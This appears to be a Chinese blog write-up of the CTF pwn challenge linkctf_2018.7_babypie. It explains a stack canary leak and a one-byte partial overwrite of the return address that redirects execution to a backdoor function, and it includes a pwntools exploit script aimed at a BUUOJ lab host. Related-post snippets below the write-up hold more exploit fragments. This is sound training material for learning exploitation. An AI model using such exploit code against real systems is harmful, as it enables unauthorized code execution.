linkctf_2018.7_babypie

最新推荐文章于 2024-09-10 19:45:10 发布
最新推荐文章于 2024-09-10 19:45:10 发布
阅读量120 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132867450
版权

linkctf_2018.7_babypie

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

64位保护全开

__int64 sub_960()
{
  __int64 buf[6]; // [rsp+0h] [rbp-30h] BYREF

  buf[5] = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  memset(buf, 0, 32);
  puts("Input your Name:");
  read(0, buf, 0x30uLL);
  printf("Hello %s:\n", (const char *)buf);
  read(0, buf, 0x60uLL);
  return 0LL;
}

第一次read,直接把canary泄露出来

然后第二次

在这里插入图片描述

返回地址跟后门差距不大,直接覆盖返回地址的低位即可

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",26096,"./pwn",10)
context(os='linux', arch='amd64',log_level='debug')

sa(b'Name:',b'a'*0x28+b'b')
ru(b'b')
can=get_canary()
li(can)
pl=cyclic(0x28)+p64(can)+p64(0)+b'\x42'
sa(b':',pl)

ia(c)

在这里插入图片描述

YameMres
关注
专栏目录
buuoj刷题记录 - linkctf_2018.7_babypie
qq_34010404的博客
03-18 313
检查程序保护: 拖进IDA看一下,只有一小段代码,存在溢出漏洞 main函数上面有个后门函数 覆盖ret地址到后门函数即可,由于开启了PIE,和Canary,不能直接溢出 下面这两行代码可以把canary打出来 最后由于后门函数入口地址和返回地址只有低字节不同,所以覆盖掉返回地址的低字节即可.,不需要获取程序基址. exp: from pwn import* #sh = process('./pwn') sh = remote('node4.buuoj.cn',29231) payload = b'
2018 - 安恒杯 - babypie [stack partial overwrite]
ACdream
02-13 1302
明显的是缓冲区溢出呀,read函数可以多读 64位程序,开启了NX和PIE,且程序里有了system("/bin/sh") 目标:控制RIP到A3E函数即可~ 首先,要处理canary的问题~然后,覆盖返回地址~ partial overwrite:在开启了PIE后,无论高位地址如何变化,低位地址是不变的,意味着有概率“撞到”正确的地址 exp如下: #!/usr/bin/e...
partial overwrite
FUCKING12的博客
11-19 824
就是partial overwrite,个人理解就是栈上有一个地址,这个地址和你想利用的地址又十分相近,只差1,2个字节于是就可以通过爆破这1,2个字节来达到利用的目的。此题开了pie canary,有个后门函数,然后思路就是栈溢出到system这,泄露canary这参考。栈上ret处的地址我们可以爆破最后2个字节,来ret到getshell这个函数的地址来得到shell。栈溢出到system需要用到一个利用手法。
[SUCTF2018]babyre
m0_46296905的博客
05-05 811
题目:[SUCTF2018]babyre C++写的64位bin文件 查找字符串定位到主函数 __int64 sub_140012460() { char *v0; // rdi __int64 i; // rcx char v3[48]; // [rsp+0h] [rbp-20h] BYREF char v4[32]; // [rsp+30h] [rbp+10h] char v5[184]; // [rsp+50h] [rbp+30h] BYREF char v6[60]; //
Could not load dynamic library 'cublas64_11.dll';此类报错的dll资源
04-30
cublas64_10.dll+cublas64_11.dll+cublasLt64_11.dll+cudart64_101.dll+cudart64_110.dll+cudnn64_8.dll+cufft64_10.dll+curand64_10.dll+cusolver64_11.dll+cusolverMg64_11.dll+cusparse64_11.dll;...
local_policy.jar和US_export_policy.jar
06-17
Java Cryptography Extension (JCE) 是Java平台标准的一部分,它提供了高级加密算法和技术,使得开发者能够在Java应用程序中实现安全的加密功能。在Java 1.6、1.7和1.8版本中,JCE包括两个重要的jar文件:`local_...
ws2_32.lib.zip
06-08
标题中的"ws2_32.lib.zip"是一个压缩包文件,它包含了两个重要的组件:ws2_32.dll和ws2_32.lib。这两个组件是Windows Socket 2(Winsock2)接口的动态链接库(DLL)和静态链接库(LIB),用于支持在Windows操作系统...
Keil.STM32F1xx_DFP.2.3.0.pack(STM32F1xx系列最新固件库for Keil MDK 5)
06-21
Version: 2.3.0 (2018-11-05) Keil.STM32F1xx_DFP.2.3.0.pack Added DBGMCU INI files for setting up debug configuration. Fixed case insensitive include of device header file (fixing build error on Linux)...
mkl-2018.0.3离线安装包(附安装说明)
12-11
windows + anaconda 安装pytorch时,直接利用官网的conda命令安装时,需要安装mkl-2018.0.3,但是该库下载极慢,所以通过其他途径下载下来了mkl-2018.3文件,然后利用conda进行离线安装。最终顺利安装成功。
HCTF-2018-Official-Writeup
qq_24966613的博客
11-14 4818
HCTF 2018 Official WriteupSimplified Chinese VersionWebWarmupweb签到首先打开然后看F12啦,注释里提示是source.php,php审计,问题出在page=urldecode(_page = urldecode(p​age=urldecode(page); $_page = mb_substr( page,<spancl...
BUUCTF-pwn(12)
njh18790816639的博客
01-13 2904
[极客大挑战 2019]Not Bad orw类型,打开文件,读入内容,输出内容!但需要注意gadget! from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './bad' r = remote('node4.buuoj.cn',29934) #r = process(binary) elf = ELF(binary) mnap = 0x123000 jmp_rsp = 0x0400a01 r.r
buuoj Pwn writeup 206-210
yongbaoii的博客
08-31 467
206 ciscn_2019_c_3 一堆乱七八糟。 create 207 metasequoia_2020_summoner 208 linkctf_2018.7_babypie 209 wdb_2018_3rd_pesp 210 TWCTF_online_2019_asterisk_alloc
【pwn】 0ctf_2017_babyheap
Nothing
12-11 630
例行检查 保护全开。 分析程序。在fill函数中存在溢出,通overlap,泄露libc。然后fastbin attack。 from pwn import * io=remote('node3.buuoj.cn',27627) libc=ELF('./libc-2.23.so') def add(size): io.recvuntil('Command: ') io.send...
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 1011
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
注册安全分析报告:熊猫频道
Explinks的博客
09-10 585
熊猫频道作为央视的子频道, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 799
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
新书宣传:《量子安全:信息保护新纪元》
最新发布
Chahot的博客
09-10 555
你好!这是我第一次发布类广告的博文,目的也很单纯,希望以作者的身份介绍一下自己出版的图书——《量子安全:信息保护新纪元》。此书于2024年7月出版,目前各大平台有售,是电子工业出版社&博文视点旗下图书。本书从经典信息安全框架始详细阐述了网络安全的核心概念、关键技术及其应用,并对以量子密钥分发、量子隐态传输、超密编码等为代表的量子安全技术行了深的解析,以实际案例和故事为基础,增强了内容的趣味性和实用性,最后还揭示了前沿量子安全技术的研究成果与方向。
V40 sys_config.fex配置详解:全志平台关键设置指南
7. **触摸按键(Tkey)**: - 对触摸按键的输入控制参数(tkey_para)进行了介绍。 8. **马达(Motor)**: - 马达控制功能的参数(motor_para),包括电机类型、速度和方向设置。 9. **闪存(NANDFlash)**: - 对NAND...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值